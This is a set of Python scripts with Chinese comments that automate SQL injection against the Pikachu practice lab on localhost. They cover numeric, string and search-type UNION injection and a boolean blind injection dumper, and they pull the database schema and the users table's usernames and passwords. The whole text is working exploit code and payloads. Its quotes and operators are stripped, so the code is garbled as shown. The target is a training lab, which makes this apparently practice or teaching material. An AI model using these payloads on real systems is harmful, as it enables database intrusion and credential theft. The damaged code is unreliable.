import requests import re url http://localhost/pikachu-master/vul/sqli/sqli_id.php if __name__ __main__: with open(sqli_id_final.txt, w, encodingutf-8) as f: print( 1. 判断数字型注入 ) res_true requests.post(url, data{id: 1 or 11, submit: 查询}) res_false requests.post(url, data{id: 1 and 12, submit: 查询}) if len(res_true.text) ! len(res_false.text): print([] 存在数字型注入) f.write([] 存在数字型注入\n\n) else: print([-] 注入失败) exit() print(\n 2. 爆库/表/字段修复版 ) # 爆库确保union select字段数为2且位置正确 db_payload 1 union select 1,database() db_res requests.post(url, data{id: db_payload, submit: 查询}) # 适配新的回显格式 db_match re.search(ryour email is: (.*?)/p, db_res.text, re.S) if db_match: db_name db_match.group(1).strip() print(f库名: {db_name}) f.write(f库名: {db_name}\n) else: print([-] 爆库失败页面无回显) # 兜底打印页面片段 print(db_res.text[:500]) # 爆表 table_payload 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() table_res requests.post(url, data{id: table_payload, submit: 查询}) table_match re.search(ryour email is: (.*?)/p, table_res.text, re.S) if table_match: tables table_match.group(1).strip() print(f表名: {tables}) f.write(f表名: {tables}\n) else: print([-] 爆表失败) # 爆字段 col_payload 1 union select 1,group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase() col_res requests.post(url, data{id: col_payload, submit: 查询}) col_match re.search(ryour email is: (.*?)/p, col_res.text, re.S) if col_match: cols col_match.group(1).strip() print(f字段: {cols}) f.write(f字段: {cols}\n\n) else: print([-] 爆字段失败) print(\n 3. 直接爆账号密码适配当前回显格式 ) # 核心Payload直接用2个字段适配原始SQL pwd_payload 1 union select username,password from users pwd_res requests.post(url, data{id: pwd_payload, submit: 查询}) # 修复版正则适配你当前页面的 br / 格式 pattern re.compile(rhello,(.*?) br\s*/your email is: (.*?)/p, re.S) matches pattern.findall(pwd_res.text) if matches: print([] 账号密码列表) f.write([] 账号密码列表\n) for username, password in matches: print(f账号: {username.strip()} | 密码: {password.strip()}) f.write(f账号: {username.strip()} | 密码: {password.strip()}\n) else: print([-] 未提取到账号数据直接打印页面关键片段) for line in pwd_res.text.splitlines(): if hello in line or your email in line: print(line.strip()) f.write(line.strip() \n) print(\n[√] 结果已保存到 sqli_id_final.txt)import requests import re url http://localhost/pikachu-master/vul/sqli/sqli_str.php if __name__ __main__: with open(sqli_final.txt, w, encodingutf-8) as f: print( 1. 判断注入 ) res_true requests.get(url, params{name: kobe or 11 #, submit: 查询}) res_false requests.get(url, params{name: kobe and 12 #, submit: 查询}) if len(res_true.text) ! len(res_false.text): print([] 存在字符型注入) f.write([] 存在字符型注入\n\n) else: print([-] 注入失败) exit() print(\n 2. 爆库/表/字段 ) # 爆库 db_payload union select 1,database() # db_res requests.get(url, params{name: db_payload, submit: 查询}) db_name re.search(ryour email is: (.*?)/p, db_res.text, re.S).group(1).strip() print(f库名: {db_name}) f.write(f库名: {db_name}\n) # 爆表 table_payload union select 1,group_concat(table_name) from information_schema.tables where table_schemapikachu # table_res requests.get(url, params{name: table_payload, submit: 查询}) tables re.search(ryour email is: (.*?)/p, table_res.text, re.S).group(1).strip() print(f表名: {tables}) f.write(f表名: {tables}\n) # 爆字段 col_payload union select 1,group_concat(column_name) from information_schema.columns where table_nameusers and table_schemapikachu # col_res requests.get(url, params{name: col_payload, submit: 查询}) cols re.search(ryour email is: (.*?)/p, col_res.text, re.S).group(1).strip() print(f字段: {cols}) f.write(f字段: {cols}\n\n) print(\n 3. 直接爆账号密码 ) # 核心Payload固定顺序不会出错 pwd_payload union select username,password from users # pwd_res requests.get(url, params{name: pwd_payload, submit: 查询}) # 修复版正则只匹配2个分组不会拆包失败 pattern re.compile(ryour uid:(.*?)br\s*/your email is:(.*?)/p, re.S) matches pattern.findall(pwd_res.text) if matches: print([] 账号密码列表) f.write([] 账号密码列表\n) for username, password in matches: print(f账号: {username.strip()} | 密码: {password.strip()}) f.write(f账号: {username.strip()} | 密码: {password.strip()}\n) else: print([-] 未提取到账号数据直接打印页面关键片段) # 直接打印页面中所有包含 your uid/your email 的行 for line in pwd_res.text.splitlines(): if your uid in line or your email in line: print(line.strip()) f.write(line.strip() \n) print(\n[√] 结果已保存到 sqli_final.txt)import requests import re url http://localhost/pikachu-master/vul/sqli/sqli_search.php if __name__ __main__: with open(sqli_search_final.txt, w, encodingutf-8) as f: print( 1. 判断搜索型注入 ) payload xxx% OR 11 # res_true requests.get(url, params{name: payload, submit: 搜索}) res_false requests.get(url, params{name: xxx% AND 12 #, submit: 搜索}) if len(res_true.text) ! len(res_false.text): print([] 存在搜索型注入注释符闭合) f.write([] 存在搜索型注入注释符闭合\n\n) else: print([-] 注入失败) exit() print(\n 2. 获取页面关键片段 ) pwd_res requests.get(url, params{name: payload, submit: 搜索}) # 打印所有包含用户信息的行 for line in pwd_res.text.splitlines(): if username in line or email in line or uid in line: print(line.strip()) f.write(line.strip() \n) # 修复版正则只匹配 2 个有效分组彻底解决拆包错误 # 匹配格式usernamexxxbr /uid:1 br /email is: xxx pattern re.compile(rusername([^])br\s*/uid:(\d)\s*br\s*/email is:\s*([^])/p, re.S) matches pattern.findall(pwd_res.text) if matches: print(\n[] 提取到的账号密码) f.write(\n[] 提取到的账号密码\n) for uname, uid, email in matches: print(fuid:{uid} | 账号:{uname.strip()} | 邮箱/密码:{email.strip()}) f.write(fuid:{uid} | 账号:{uname.strip()} | 邮箱/密码:{email.strip()}\n) else: print(\n[-] 未提取到账号数据可参考上方页面片段) f.write(\n[-] 未提取到账号数据\n) print(\n[√] 结果已保存到 sqli_search_final.txt)import requests # 目标URL url http://127.0.0.1/pikachu-master/vul/sqli/sqli_search.php def is_true(payload): # 构造注入存在返回True不存在返回False params { name: fxxx% OR {payload}#, submit: 搜索 } r requests.get(url, paramsparams) # 页面有结果返回True无结果返回False return username in r.text # 爆数据函数 def dump_data(sql): result print(正在提取, end) for i in range(1, 50): left, right 32, 126 while left right: mid (left right) // 2 payload fascii(substr(({sql}),{i},1)){mid} if is_true(payload): left mid 1 else: right mid - 1 if left 32: break result chr(left) print(chr(left), end, flushTrue) print() return result if __name__ __main__: print(*60) print( Pikachu 搜索型注入 布尔盲注 全自动爆库) print(*60) # 1 爆数据库 print(\n[1] 当前数据库) db dump_data(select database()) # 2 爆表名 print(\n[2] 表名) tables dump_data(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) # 3 爆字段 print(\n[3] users 表字段) cols dump_data(select group_concat(column_name) from information_schema.columns where table_nameusers) # 4 爆账号密码 print(\n[4] 账号 | 密码) print(-*40) data dump_data(select group_concat(username,:,password) from users) for line in data.split(,): if : in line: user, pwd line.split(:,1) print(f账号{user} | 密码{pwd}) print(-*40) print(\n[✅ 脱库完成])